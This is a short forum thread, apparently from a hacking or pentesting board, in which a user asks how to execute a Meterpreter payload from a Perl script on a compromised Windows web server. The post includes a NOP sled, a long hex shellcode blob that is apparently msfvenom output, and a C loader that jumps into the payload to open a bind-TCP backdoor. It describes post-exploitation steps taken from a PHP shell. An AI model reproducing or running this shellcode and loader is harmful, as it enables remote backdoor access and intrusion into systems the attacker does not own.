[Perl] Running meterpreter payload directly from Perl script

[sopinha]

I was wondering if it was possible to run a payload directly from the execution of a Perl script in a compromised machine (with Perl installed).

Having the following code, how do I run the contents of $shellcode from the script?

Code: [Select]

my $junk = "\x90" x 504;

my $shellcode="\x90" x 50;

$shellcode=$shellcode.
"\xba\xce\xb2\xa4\x42\xdd\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" .
"\xb1\x4a\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\x3b\x4e" .
"\x4c\xc4\xc3\xaf\x8d\xa9\x4a\x4a\xbc\xfb\x28\x1e\xed\xcb" .
"\x3b\x72\x1e\xa7\x69\x67\x95\xc5\xa5\x88\x1e\x63\x93\xa7" .
"\x9f\x45\x1b\x6b\x63\xc7\xe7\x76\xb0\x27\xd6\xb8\xc5\x26" .
"\x1f\xa4\x26\x7a\xc8\xa2\x95\x6b\x7d\xf6\x25\x07\xcd\xe7" .
"\x2d\xf4\x87\x06\x1f\xab\x9c\x50\xbf\x4d\x71\xe9\xf6\x55" .
"\x96\xd2\x41\xed\x6c\xa0\x53\x27\xbd\x49\x62\x07\x11\x74" .
"\x4a\x8a\x68\xb0\x6d\x75\x1f\xca\x8d\x08\x27\x09\xef\xd6" .
"\xa2\x8c\x57\x9c\x14\x75\x69\x71\xc2\xfe\x65\x3e\x81\x59" .
"\x6a\xc1\x46\xd2\x96\x4a\x69\x35\x1f\x08\x4d\x91\x7b\xca" .
"\xec\x80\x21\xbd\x11\xd2\x8e\x62\xb7\x98\x3d\x76\xce\xc2" .
"\x29\xbb\xe2\xfc\xa9\xd3\x75\x8e\x9b\x7c\x2d\x18\x90\xf5" .
"\xeb\xdf\xd7\x2f\x4b\x4f\x26\xd0\xab\x59\xed\x84\xfb\xf1" .
"\xc4\xa4\x90\x01\xe8\x70\x36\x52\x46\x2b\xf6\x02\x26\x9b" .
"\x9e\x48\xa9\xc4\xbe\x72\x63\x6d\x0f\x56\xdf\xfa\x6d\x68" .
"\xf1\xa6\xf8\x8e\x9b\x46\xac\x19\x34\xa5\x8b\x91\xa3\xd6" .
"\xfe\x8d\x7c\x41\xb7\xdb\xbb\x6e\x48\xce\xef\xc3\xe1\x99" .
"\x7b\x08\x36\xbb\x7b\x05\x1f\xac\xec\xd3\xf1\x9f\x8d\xe4" .
"\xd8\x4a\x4e\x71\xe6\xdc\x19\xed\xe4\x39\x6d\xb2\x17\x6c" .
"\xe5\x7b\x8d\xcf\x92\x83\x41\xd0\x62\xd2\x0b\xd0\x0a\x82" .
"\x6f\x83\x2f\xcd\xba\xb7\xe3\x58\x44\xee\x50\xca\x2c\x0c" .
"\x8e\x3c\xf3\xef\xe5\xbc\xc8\x39\xc0\x3a\x38\x4c\x20\x87";

[sopinha]

Let's say I am pentesting a Windows webserver and somehow get a PHP shell. Now, the owner of the Apache server is not System, so I want to elevate privileges somehow. I try to run a binary file in the target machine, containing a meterpreter payload, which I compiled from the C code:

Code: [Select]

// Our Meterpreter code goes here
unsigned char payload[]="<shellcode>";

// Push Meterpreter into memory
int main(void) { ((void (*)())payload)();}
Where <shellcode> refers to the code obtained from msfvenom to initiate a meterpreter bind tcp handler on the target machine, which will listen for incoming connections.
But as I try to run this binary file, I notice that I don't have enough privileges to run it, and there is no folder in the server from where I can run it. So then I notice the server has Perl installed and I wonder, if I run a script in Perl which behaves the same way as the compiled C code I tried to execute, would it be possible to create the backdoor directly from the script?
So my main question here is: is there any way to emulate the cast ((void (*)()) in Perl to push the payload into memory?